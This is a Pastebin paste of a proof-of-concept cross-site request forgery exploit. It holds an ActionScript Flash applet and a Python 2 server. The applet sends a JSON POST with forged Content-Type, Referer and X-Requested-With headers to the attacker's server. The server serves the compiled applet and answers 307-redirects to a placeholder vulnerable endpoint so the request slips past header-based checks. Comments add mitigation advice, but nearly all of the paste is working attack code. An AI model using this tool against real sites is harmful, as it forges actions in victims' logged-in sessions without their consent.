Untitled

a guest
Feb 15th, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
package
{
import flash.display.Sprite;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestHeader;
import flash.net.URLRequestMethod;

/**
 * Proof-of-concept Flash applet. On construction it issues a single POST
 * carrying a JSON body and three caller-chosen request headers
 * ("Content-Type", "Referer", "X-Requested-With") to http://my-server:8000/.
 * The Python server on this page answers that POST with a 307 redirect to
 * the vulnerable endpoint; whether the headers and body are carried across
 * the redirect is runtime behaviour, not something this code checks.
 *
 * Defensive note: an endpoint that accepts the resulting request is using
 * Content-Type, Referer or X-Requested-With as its only cross-site check.
 * None of those is a trustworthy signal; the mitigation is a session-bound
 * anti-CSRF token (or Origin validation plus SameSite cookies) on the
 * receiving endpoint.
 */
public class csrf extends Sprite
{
    public function csrf()
    {
        super();
        var member1:Object = null;
        var myJson:String = null;
        member1 = new Object();          // dead assignment: replaced by the literal on the next line
        member1 = {
            "user_id":36427093           // hard-coded example payload field
        };
        var myData:Object = member1;
        myJson = JSON.stringify(myData); // body is a JSON string, not form-encoded
        var url:String = "http://my-server:8000/";   // the redirector, not the final target
        var request:URLRequest = new URLRequest(url);
        // Custom headers pushed onto the request; whether the runtime honours
        // each name is not verified here (a synchronous failure is traced below).
        request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
        request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
        request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
        request.data = myJson;
        request.method = URLRequestMethod.POST;
        var urlLoader:URLLoader = new URLLoader();

        // Fire-and-forget: no event listeners are attached, so the response is
        // discarded and only an exception thrown by load() itself is logged.
        try
        {
            urlLoader.load(request);
            return;
        }
        catch(e:Error)
        {
            trace(e);
            return;
        }
    }
}
}
import BaseHTTPServer   # Python 2 module (http.server in Python 3)
import time
import sys              # imported but not used below

HOST = ''               # empty host binds on all interfaces
PORT = 8000
# Target of the 307 redirect that RedirectHandler issues for every path other than /csrf.swf.
vulnerable_endpoint="https://some-vulnerable-endpoint-here"
class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Serve the compiled applet, redirect everything else.

    Two behaviours keyed on the request path:
      * /csrf.swf   -> 200 with the compiled Flash file from the working directory
      * any other   -> 307 to vulnerable_endpoint, no response body

    307 (rather than 301/302) tells a client that follows it to keep the
    original method and body instead of downgrading to GET; whether request
    headers are preserved is client behaviour this code does not control.
    GET requests are routed through the same logic (see do_GET).

    Defensive note for the redirect target: the request it receives arrives
    via a cross-site redirect, so validating Origin/Host and requiring a
    session-bound CSRF token defeats this flow regardless of which headers
    the client sets.
    """
    def do_POST(s):
        # `s` is the conventional `self`.
        if s.path == '/csrf.swf':
            s.send_response(200)
            s.send_header("Content-Type","application/x-shockwave-flash")
            s.end_headers()
            # The file handle is never closed explicitly, and if csrf.swf is
            # missing open() raises after the 200 headers have already been sent.
            s.wfile.write(open("csrf.swf", "rb").read()) # csrf.swf is the filename you compiled the above actionscript to
            return
        # Any other path: redirect without reading the request body.
        s.send_response(307)
        s.send_header("Location", vulnerable_endpoint)
        s.end_headers()
    def do_GET(s):
        # Log the requested path, then reuse the POST branch logic.
        print(s.path)
        s.do_POST()
if __name__ == '__main__':
    # Python 2 entry point (print statements, BaseHTTPServer module).
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST,PORT), RedirectHandler)
    print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass   # Ctrl-C is the expected way to stop; fall through to cleanup
    httpd.server_close()
    print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)